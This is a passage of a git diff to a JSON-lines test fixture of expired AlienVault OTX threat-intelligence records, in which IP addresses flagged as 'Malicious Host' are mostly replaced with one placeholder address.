14:35:53","id":1907,"indicator_id":341,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1908,"indicator_id":341,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1909,"indicator_id":341,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1910,"indicator_id":341,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Houston"},{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1911,"indicator_id":341,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1912,"indicator_id":341,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"56a1917632c03f230c5645f432e71495","id":341,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":341,"indicator_id":341,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00","provider":"testprovider","tlp_name":"testtlp"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"69.216.117.22"} 
-{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1913,"indicator_id":342,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1914,"indicator_id":342,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Fort Lauderdale"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1915,"indicator_id":342,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1916,"indicator_id":342,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1917,"indicator_id":342,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1918,"indicator_id":342,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"6de45834c2a81597b59a91ead4fbdf59","id":342,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":342,"indicator_id":342,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP 
Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"69.80.70.115"} -{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1919,"indicator_id":343,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1920,"indicator_id":343,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Pompano Beach"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1921,"indicator_id":343,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1922,"indicator_id":343,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1923,"indicator_id":343,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1924,"indicator_id":343,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"994a4586b27e46db67a59220ab6dd73f","id":343,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":343,"indicator_id":343,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 
19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"69.65.79.99"} -{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1937,"indicator_id":346,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1938,"indicator_id":346,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1939,"indicator_id":346,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1940,"indicator_id":346,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1941,"indicator_id":346,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Little Elm"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1942,"indicator_id":346,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"40e81e10007099902cf40cfe3a8227dc","id":346,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":346,"indicator_id":346,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious 
threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"69.199.22.46"} -{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1943,"indicator_id":347,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1944,"indicator_id":347,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1945,"indicator_id":347,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1946,"indicator_id":347,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1947,"indicator_id":347,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Dallas"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1948,"indicator_id":347,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"418a88a2a1bac6980a7d83e6b2b2a27d","id":347,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":347,"indicator_id":347,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 
14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"69.162.74.166"} \ No newline at end of file +{"adversaries":[],"attributes":[{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1877,"indicator_id":336,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1878,"indicator_id":336,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"MP"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1879,"indicator_id":336,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Saipan"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1880,"indicator_id":336,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1881,"indicator_id":336,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1882,"indicator_id":336,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"1ece659dcec98b1e1141160b55655c96","id":336,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":336,"indicator_id":336,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 
14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"89.160.20.156"} +{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1883,"indicator_id":337,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1884,"indicator_id":337,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1885,"indicator_id":337,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1886,"indicator_id":337,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1887,"indicator_id":337,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1888,"indicator_id":337,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Sacramento"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"73c98d43519990c841a5d022546fedd4","id":337,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":337,"indicator_id":337,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault 
OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"89.160.20.156"} +{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1889,"indicator_id":338,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1890,"indicator_id":338,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1891,"indicator_id":338,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1892,"indicator_id":338,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1893,"indicator_id":338,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"New York"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1894,"indicator_id":338,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"a9c6773919112627495d87c51fe89b15","id":338,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 
14:35:53","creator_source_id":12,"id":338,"indicator_id":338,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"89.160.20.156"} +{"adversaries":[],"attributes":[{"attribute_id":8,"created_at":"2020-09-11 14:35:43","id":184,"indicator_id":34,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:35:49","updated_at":"2020-10-15 14:35:49","value":"4"},{"attribute_id":6,"created_at":"2020-09-11 14:35:43","id":185,"indicator_id":34,"name":"AlienVault Revision","touched_at":"2020-10-15 14:35:49","updated_at":"2020-10-15 14:35:49","value":"3"},{"attribute_id":3,"created_at":"2020-09-11 14:35:43","id":186,"indicator_id":34,"name":"Description","touched_at":"2020-10-15 14:35:49","updated_at":"2020-10-15 14:35:49","value":"Malicious Host"},{"attribute_id":7,"created_at":"2020-09-11 14:35:43","id":187,"indicator_id":34,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:35:49","updated_at":"2020-10-15 14:35:49","value":"2"}],"class":"network","created_at":"2020-09-11 14:35:41","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:02","hash":"56f3cb07a9055f52947bb4c4244f762d","id":34,"published_at":"2020-09-11 14:35:41","score":4,"sources":[{"created_at":"2020-09-11 14:35:43","creator_source_id":12,"id":34,"indicator_id":34,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:43","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:35:49"}],"status":{"description":"No longer poses 
a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"89.160.20.156"} +{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1901,"indicator_id":340,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1902,"indicator_id":340,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1903,"indicator_id":340,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1904,"indicator_id":340,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1905,"indicator_id":340,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1906,"indicator_id":340,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Sacramento"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"97624a37200db6ba0bcfce8c9c28f527","id":340,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":340,"indicator_id":340,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 
14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"89.160.20.156"} +{"adversaries":[],"attributes":[{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1907,"indicator_id":341,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1908,"indicator_id":341,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1909,"indicator_id":341,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1910,"indicator_id":341,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Houston"},{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1911,"indicator_id":341,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1912,"indicator_id":341,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"56a1917632c03f230c5645f432e71495","id":341,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":341,"indicator_id":341,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 
14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00","provider":"testprovider","tlp_name":"testtlp"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"89.160.20.156"} +{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1913,"indicator_id":342,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1914,"indicator_id":342,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Fort Lauderdale"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1915,"indicator_id":342,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1916,"indicator_id":342,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1917,"indicator_id":342,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1918,"indicator_id":342,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"6de45834c2a81597b59a91ead4fbdf59","id":342,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 
14:35:53","creator_source_id":12,"id":342,"indicator_id":342,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"89.160.20.156"} +{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1919,"indicator_id":343,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1920,"indicator_id":343,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Pompano Beach"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1921,"indicator_id":343,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1922,"indicator_id":343,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1923,"indicator_id":343,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1924,"indicator_id":343,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"994a4586b27e46db67a59220ab6dd73f","id":343,"published_at":"2020-09-11 
14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":343,"indicator_id":343,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"89.160.20.156"} +{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1937,"indicator_id":346,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1938,"indicator_id":346,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1939,"indicator_id":346,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1940,"indicator_id":346,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1941,"indicator_id":346,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Little Elm"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1942,"indicator_id":346,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 
14:40:03","hash":"40e81e10007099902cf40cfe3a8227dc","id":346,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":346,"indicator_id":346,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"89.160.20.156"} +{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1943,"indicator_id":347,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1944,"indicator_id":347,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1945,"indicator_id":347,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1946,"indicator_id":347,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1947,"indicator_id":347,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Dallas"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1948,"indicator_id":347,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 
